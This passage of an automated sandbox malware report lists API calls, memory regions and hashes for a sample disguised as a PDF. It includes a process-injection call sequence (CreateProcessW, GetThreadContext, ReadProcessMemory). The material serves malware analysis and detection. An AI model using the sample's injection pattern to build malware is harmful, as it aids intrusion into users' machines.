                              • _malloc.LIBCMT ref: 0043214B
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _malloc.LIBCMT ref: 0043215D
                              • _malloc.LIBCMT ref: 0043216F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID:
                              • API String ID: 680241177-0
                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                              APIs
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekTranslate
                              • String ID:
                              • API String ID: 4217535847-0
                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                              • Opcode Fuzzy Hash: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                              • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                              • Opcode Fuzzy Hash: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                              • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                              APIs
                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                              • _strcat.LIBCMT ref: 0040F786
                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                              • String ID:
                              • API String ID: 3199840319-0
                              • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                              • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                              APIs
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FreeInfoLibraryParametersSystem
                              • String ID:
                              • API String ID: 3403648963-0
                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                              APIs
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              • __lock_file.LIBCMT ref: 00414A8D
                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                              • __fclose_nolock.LIBCMT ref: 00414A98
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                              APIs
                              • __lock_file.LIBCMT ref: 00415012
                              • __ftell_nolock.LIBCMT ref: 0041501F
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2999321469-0
                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040042EB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04004381
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040043A3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                              • Instruction ID: c51dc0cdf22929844eb7c758ccf142c39f50ebf4a9617b71384bd2dccd5344d9
                              • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                              • Instruction Fuzzy Hash: F812EE24E18658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F81CF5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                              • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                              • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __lock_file
                              • String ID:
                              • API String ID: 3031932315-0
                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                              APIs
                                • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                              • VariantClear.OLEAUT32(?), ref: 0047973E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Clear$CopyInit
                              • String ID:
                              • API String ID: 24293632-0
                              • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                              • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                              • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                              • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 04004B41
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: a5a2deed5a25c7c254e280ed9452fc980578f6af2c5a3a50c17d266c6b2cce97
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 6DE0BF7494020D9FDB00EFA4D94969E7FB4EF04301F104561FD01A2280D63099508A62
                              APIs
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                              • GetKeyState.USER32(00000011), ref: 0047C92D
                              • GetKeyState.USER32(00000009), ref: 0047C936
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                              • GetKeyState.USER32(00000010), ref: 0047C953
                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                              • _wcsncpy.LIBCMT ref: 0047CA29
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                              • SendMessageW.USER32 ref: 0047CA7F
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                              • ImageList_SetDragCursorImage.COMCTL32(00938D90,00000000,00000000,00000000), ref: 0047CB9B
                              • ImageList_BeginDrag.COMCTL32(00938D90,00000000,000000F8,000000F0), ref: 0047CBAC
                              • SetCapture.USER32(?), ref: 0047CBB6
                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                              • ReleaseCapture.USER32 ref: 0047CC3A
                              • GetCursorPos.USER32(?), ref: 0047CC72
                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                              • SendMessageW.USER32 ref: 0047CD12
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                              • SendMessageW.USER32 ref: 0047CD80
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                              • GetCursorPos.USER32(?), ref: 0047CDC8
                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                              • GetParent.USER32(00000000), ref: 0047CDF7
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                              • SendMessageW.USER32 ref: 0047CE93
                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,01731B70,00000000,?,?,?,?), ref: 0047CF1C
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                              • SendMessageW.USER32 ref: 0047CF6B
                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,01731B70,00000000,?,?,?,?), ref: 0047CFE6
                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3100379633-4164748364
                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
